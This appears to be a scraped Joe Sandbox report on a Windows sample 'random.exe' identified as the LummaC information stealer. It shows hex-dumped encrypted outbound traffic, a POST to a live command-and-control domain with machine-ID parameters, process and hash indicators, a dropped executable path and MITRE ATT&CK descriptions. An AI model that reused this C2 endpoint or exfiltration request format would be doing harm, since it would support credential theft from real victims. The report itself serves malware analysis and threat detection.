2025-03-29 13:23:23 UTC	15331	OUT	Data Raw: 61 78 de 49 56 c1 75 41 a6 c0 72 f6 5f d4 3b 71 ef 00 9b 2e 16 35 bc c5 9d d5 a9 49 8c ac 32 71 cd a5 29 6c d7 41 cd f3 b5 f0 5b 8a 05 1f 2f b7 a1 09 6f f3 84 d6 53 a6 88 bd ba 4c b4 2a 4a bf 59 93 8b 34 5c a8 c4 f7 d3 1c 1b 68 9d a4 e1 42 5f ad 19 c7 2a 32 dc 42 4b ba cd ba ca 61 d3 d2 0f 89 a0 90 e9 25 77 f4 8a ba f1 7c 0c 07 f2 af 3e 92 84 7b 53 a5 05 df 6c 00 8f 45 bb 0d 6b 8a 56 c9 76 00 ed 15 8e 2f f6 69 14 ce ee 77 0e 86 61 22 4a ec 97 9e c8 fd 0c e9 9e a0 7f de 79 4a 41 da a9 14 81 84 25 dd 70 86 a1 5d 5f e1 9f 28 47 15 3a bc e0 62 65 ae 84 57 1e 76 f8 ab 51 b5 a8 48 8e 98 a3 50 52 df a5 a8 1c ca 03 6d 6f 7d 20 ca 90 2a 99 d9 b1 d6 30 5a 17 d6 45 29 ad 1d b6 90 35 87 d0 65 c7 4d 06 41 b3 2e c0 28 c3 af a1 ba f8 4c 2c b2 55 37 d5 f2 9f f5 13 99 70 Data Ascii: axIVuAr_;q.5I2q)lA[/oSLJY4\hB_2BKa%w\|>{SlEkVv/iwa"JyJA%p]_(G:beWvQHPRmo} *0ZE)5eMA.(L,U7p
2025-03-29 13:23:23 UTC	15331	OUT	Data Raw: 43 09 a5 4e 49 26 70 32 8a c3 99 1e 82 a4 cc 76 b6 ff 62 cc ae 6a ec 2f 0f 24 fd 60 31 a8 82 c2 66 af 44 19 b6 a1 82 64 4b 03 e8 2e 74 11 01 c6 b8 74 9e 09 19 ca 1b a0 83 54 25 e4 30 5c af a6 6f 83 88 04 59 e3 97 22 d2 93 7f 1a df 23 89 5b ae 80 ad 8f a4 bc c8 08 fc 08 78 dc 10 64 f4 30 d2 71 89 63 c9 65 1b 35 75 5a 58 ba ef 92 77 c4 5e 90 cf 6e c0 fe 1a ff 45 a0 dd 36 6b 98 60 ae 64 a3 15 13 d2 70 15 6a 8e 3d 20 8f e2 9b 8c 8c b3 5a 96 84 30 18 17 b2 5e 33 cb ff 8e 86 72 4b 84 29 ef 89 76 a2 06 92 2d 10 e5 d5 cd 19 c2 ec 81 49 a1 30 00 42 74 92 e6 81 b8 c9 7d 5e 03 96 41 cb e7 d0 8e 25 80 68 af 54 a8 a0 c2 b3 c9 5c cf 29 1c 0b 75 ed 23 72 67 ab 0e fc 47 26 e3 96 ac 60 4c 77 be 38 d9 b5 dc 73 d5 11 03 7f 75 c0 06 f0 7a b8 e7 42 75 fb c2 8f 38 13 2a b4 5f Data Ascii: CNI&p2vbj/$`1fDdK.ttT%0\oY"#[xd0qce5uZXw^nE6k`dpj= Z0^3rK)v-I0Bt}^A%hT\)u#rgG&`Lw8suzBu8*_
2025-03-29 13:23:23 UTC	15331	OUT	Data Raw: e3 08 05 27 be 8f cb 39 48 e2 88 dc 2f 04 10 8b e9 10 1f 12 46 72 41 c3 0c 59 af 31 64 b6 75 08 c2 c3 ad 9c 82 fc 0b 34 b1 5d 32 48 e9 c4 5b 6f f3 2e 92 cf 70 95 55 92 d2 d7 0e 73 fb cf 54 fd 66 d6 59 53 dd d6 33 f2 f0 d9 9b 59 d0 84 a3 8a cd 20 98 3c 04 4b 20 71 ac 9b 59 12 cd e4 00 91 d3 25 d5 0a 56 37 22 71 eb 39 5b cd b6 17 54 00 59 ad d2 c2 7d c7 5b 74 a2 69 dd b4 c2 b7 21 ed 03 a9 b4 2e 0e 96 e0 34 c4 e3 93 50 db 1a 6d eb 38 68 f1 17 ce e0 f1 e0 8e 5c ac 31 40 f1 fe 55 0e 4a 0e 3d fd eb 63 1a 72 ce 20 00 85 ac 88 9a 11 81 15 24 c3 f1 47 6f a8 cc eb a6 e2 4c d4 2b 18 31 44 fe 0b 88 12 ff c5 42 4a 8a 0b ab a6 b5 4d 7b f6 23 34 93 8e 87 7f 7c 5e 92 87 39 c3 6a 1d 81 04 89 2e c2 16 27 02 d3 27 3a d6 61 5b 58 d9 06 f0 99 db 5c be b8 fa 35 e4 1d 3f e0 af Data Ascii: '9H/FrAY1du4]2H[o.pUsTfYS3Y <K qY%V7"q9[TY}[ti!.4Pm8h\1@UJ=cr $GoL+1DBJM{#4\|^9j.'':a[X\5?
2025-03-29 13:23:23 UTC	15331	OUT	Data Raw: f6 09 97 f0 ae a2 d4 4f f5 bd 06 64 e1 cd 91 56 79 7a 98 40 a0 ea aa 1c 60 46 d1 bb 0e 0c 15 52 94 2e 99 df 2a f9 fa 4f 3e ea 51 44 d3 fc ad 6a 45 d2 43 a8 62 e7 89 67 fc 43 82 be c5 d8 36 c1 72 a5 08 95 5f a5 31 78 82 6f 9e 30 a9 ea 09 67 2e 11 2c 32 cc 5a e8 a8 e2 5e 82 2f 21 13 17 05 2c d1 50 2b 8d 0e ed b7 e2 47 09 48 76 fc aa 77 e0 d1 e8 5d 54 49 88 55 b2 eb 2e b3 d7 a8 73 54 a2 77 1b 5c 48 c2 b4 89 c6 2f a9 39 d3 bc e2 68 dc 94 04 51 ba a4 2d 10 c8 91 a4 4f 7d ab 45 cc 21 d2 4a c4 bb 77 dc 73 da 12 25 a1 6c b7 21 6c 2d ad 68 2b 00 9d f8 17 7f 37 2d 46 26 e7 b1 09 8b 9d 7c 6d 24 45 50 42 b8 80 a5 08 49 5b 39 f4 68 76 d6 77 3b 7f be 03 35 86 50 73 a1 dc 81 de 13 eb 47 1b 46 0a 6a ac 25 ca 6e 4c a2 09 33 9f 72 a1 d0 48 27 e0 8c 79 35 97 bc 9f b0 e2 87 Data Ascii: OdVyz@`FR.*O>QDjECbgC6r_1xo0g.,2Z^/!,P+GHvw]TIU.sTw\H/9hQ-O}E!Jws%l!l-h+7-F&\|m$EPBI[9hvw;5PsGFj%nL3rH'y5
2025-03-29 13:23:23 UTC	15331	OUT	Data Raw: bf 47 32 b3 18 81 e1 c2 86 8c a8 40 9e 13 27 ec 45 f7 cf 22 d7 db 4a c7 e4 66 a2 62 6c 81 f5 9b 31 e2 2a 54 38 a9 51 90 6c 2e 4b 85 10 83 39 60 7a 16 30 79 cc 4b 37 45 2e f9 fe 7a fc 8a 32 1d 74 3b 27 3c 55 55 e4 b3 10 5c 53 80 c9 91 9b 7f 90 14 eb 07 5f bf 86 e4 2e 75 7a cc 7c 6c 55 6a 69 c7 ed b2 41 e1 48 3d 9e 23 82 cc e1 c2 36 75 98 87 5e 72 8e c4 4a 1d 1a 07 78 24 20 b7 4c af de 94 4a 20 88 ce bf 6b f2 3f c8 74 78 8d 6a 42 0b f6 00 9f ea db 4e f1 25 d3 a2 a5 2e 04 03 ed 49 e1 8d b1 c4 62 b2 38 2c 17 30 42 a5 ca 3c 41 5d ac a1 90 7c 7a 8d 04 9c 91 f3 45 ea 86 cc ad 72 d5 48 29 78 bb 52 bb a8 0a e5 a1 f3 70 03 70 06 d6 dd 00 99 0f 06 c7 af 0a 45 be d2 e2 45 70 74 d0 db 43 ac 9c 33 46 35 a7 c6 55 62 53 a5 03 b5 1d be 24 33 18 0c b2 49 ed d2 c4 52 a9 f6 Data Ascii: G2@'E"Jfbl1*T8Ql.K9`z0yK7E.z2t;'<UU\S_.uz\|lUjiAH=#6u^rJx$ LJ k?txjBN%.Ib8,0B<A]\|zErH)xRppEEptC3F5UbS$3IR
2025-03-29 13:23:23 UTC	15331	OUT	Data Raw: 59 57 5a e4 44 c2 17 4c e7 3c 1d ea af 14 2b 6f 5d 3b f6 33 1d ba d7 af 15 b1 19 79 62 8e 52 24 8a 42 e1 d3 80 bd f9 39 67 1c cd 52 ae 32 38 09 15 6c 05 24 3e 12 b1 e7 e3 02 20 0f df 83 22 2e 1a 6c 77 6d f8 d2 a3 6d a9 cc 34 9f 8f 47 6b 04 24 8b 53 f0 38 6c 74 d7 8c b0 f2 04 4f 24 19 09 61 e6 b3 73 12 95 aa cf 7a bf fc d0 92 18 62 7f 54 ea 4d 3f 83 51 98 26 e1 1a 42 09 fe ca d4 7c b1 f5 56 0e 97 66 3d 66 49 2c d9 d4 e9 8d d5 1d fd e3 d7 d2 93 57 7f 2d e0 4b a0 e2 82 e3 57 57 29 19 4d fd 75 56 04 14 19 91 66 d6 9a 3f e9 b0 80 40 15 91 de 33 75 38 8a f2 88 a6 59 7a b9 5e fc 4f 89 56 99 74 68 55 3f 0b 5b 1e c5 b9 db fc 90 93 ea 74 71 75 d1 91 cb ad 00 3e 83 ff a8 65 05 16 df 85 3c cf 7f 49 7e d3 e0 17 12 16 e7 67 16 14 fb 4b 10 f2 d2 ff 95 14 d8 47 72 c3 3f Data Ascii: YWZDL<+o];3ybR$B9gR28l$> ".lwmm4Gk$S8ltO$aszbTM?Q&B\|Vf=fI,W-KWW)MuVf?@3u8Yz^OVthU?[tqu>e<I~gKGr?
2025-03-29 13:23:23 UTC	15331	OUT	Data Raw: 0e 87 8b b4 f7 8c a2 d9 0e 5a cd a0 3a ba 4e a0 84 9a ec a7 3f 3c cb ae d2 db 9f e6 40 91 5f bb a1 d5 37 bb 97 d5 b1 32 f4 0d 72 0e 91 0e ef 65 49 c2 7e 68 40 a5 33 d1 8a f4 c9 5a f3 37 31 1b 68 56 df 9c 5b af 24 df 0d 03 3f 5a 16 af 81 69 df fe d4 2a 0a ee 6e 2b a0 e0 76 6e 0d a9 e3 f8 e7 c2 c8 90 d0 20 dc 71 f5 18 da 7a f9 52 ab 16 ac 8e f3 40 1d 40 b9 5e 60 24 c4 2b d9 35 45 3d 3d df ef 56 8d bd 04 17 1f 79 3a ae 9c 79 f1 f3 a3 a5 35 eb 8e 4f dd fe c4 41 12 d2 4e 85 34 14 61 a0 4a 92 2e 0a 43 8f e8 2f 6d 45 97 a1 fd 3e 27 b0 9b df 6f f2 c9 b2 cb 41 a3 10 e5 fa cf e3 f4 7f df e0 ad 0d 40 24 10 f6 76 13 f6 8d a0 8e 12 a0 9a a8 1e 40 0a 56 65 5a a3 2c 9a 46 a5 45 43 a2 a1 42 c9 43 53 12 be 8e 98 f1 3e 9a e1 03 15 b8 80 d8 0c b2 87 81 f3 c6 e1 d4 a1 5c 33 Data Ascii: Z:N?<@_72reI~h@3Z71hV[$?Zi*n+vn qzR@@^`$+5E==Vy:y5OAN4aJ.C/mE>'oA@$v@VeZ,FECBCS>\3
2025-03-29 13:23:24 UTC	803	IN	HTTP/1.1 200 OK Date: Sat, 29 Mar 2025 13:23:24 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=srtbxE5rEmI9uZOahyIaoLhRp7xhtjmHXNZWQsOlTWFSrsqXm6AAoP9WIIyNyqvt0ouCeJ43aYEtb3ioywEaFz5WISDPK0QEYkL8xufdGjqBHLXM3fpS0a60yCX%2FZqeE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 927fae758f7c1871-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=100104&min_rtt=98659&rtt_var=22253&sent=200&recv=549&lost=0&retrans=0&sent_bytes=2832&recv_bytes=552318&delivery_rate=30945&cwnd=252&unsent_bytes=0&cid=a75f2d4974946044&ts=1622&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49687	172.67.172.183	443	6160	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-29 13:23:24 UTC	263	OUT	POST /gsopp HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 89 Host: oreheatq.live
2025-03-29 13:23:24 UTC	89	OUT	Data Raw: 75 69 64 3d 63 38 31 33 33 30 30 66 37 36 32 65 30 66 36 63 39 30 37 61 34 30 65 32 62 33 32 39 61 36 30 35 33 36 32 39 38 31 38 31 65 39 26 63 69 64 3d 26 68 77 69 64 3d 43 37 31 37 30 38 41 42 39 45 35 31 46 41 35 35 46 33 45 39 36 42 31 41 32 43 32 42 39 33 46 37 Data Ascii: uid=c813300f762e0f6c907a40e2b329a60536298181e9&cid=&hwid=C71708AB9E51FA55F3E96B1A2C2B93F7
2025-03-29 13:23:25 UTC	776	IN	HTTP/1.1 200 OK Date: Sat, 29 Mar 2025 13:23:25 GMT Content-Type: application/octet-stream Content-Length: 104 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5kuofM9NaNeivuLRDdcwUIRXpXrAb1C6WL76LBxUZGbRVmQhUDOTKfLevBi8%2BtN8TfROG0n2FhLtIf2EJ9CWj%2B1vifYnuQG5g2xOkee4FaJi5PPrrlxweS3wK7LjwFDq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 927fae821e004310-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=102441&min_rtt=101707&rtt_var=22209&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2831&recv_bytes=988&delivery_rate=30047&cwnd=252&unsent_bytes=0&cid=b600dee831d9ca46&ts=953&x=0"
2025-03-29 13:23:25 UTC	104	IN	Data Raw: 41 f9 db 01 a3 48 f2 8e e4 2f c3 4e 4f 5b dc 79 15 56 7a ff 8b 49 00 36 c2 28 a9 1c 00 c7 53 8b e0 0c 3c 19 93 11 67 e5 9b 5c bc 16 49 cc 82 56 0d c0 2a eb bb f8 66 ae fb a0 8d 2c 71 d4 b2 ff b6 2f ce 58 2c 9d 61 0d 62 57 08 ed ba 9f ab 5f af 0d 05 a5 fc 25 b4 2d 8c ee 1e 2a 08 7d b6 50 2f 8b e4 45 80 ce 6c 6d Data Ascii: AH/NO[yVzI6(S<g\IVf,q/X,abW_%-}P/Elm

Statistics

CPU Usage

• random.exe

Click to jump to process

Memory Usage

• random.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Target ID:	0
Start time:	09:23:12
Start date:	29/03/2025
Path:	C:\Users\user\Desktop\random.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\random.exe"
Imagebase:	0xe60000
File size:	3'014'144 bytes
MD5 hash:	C6889665DF5C7A04BACD10F52BF854DE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\W2U54XWUYRFYVUMBYUAR0TMO04229I.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
random.exe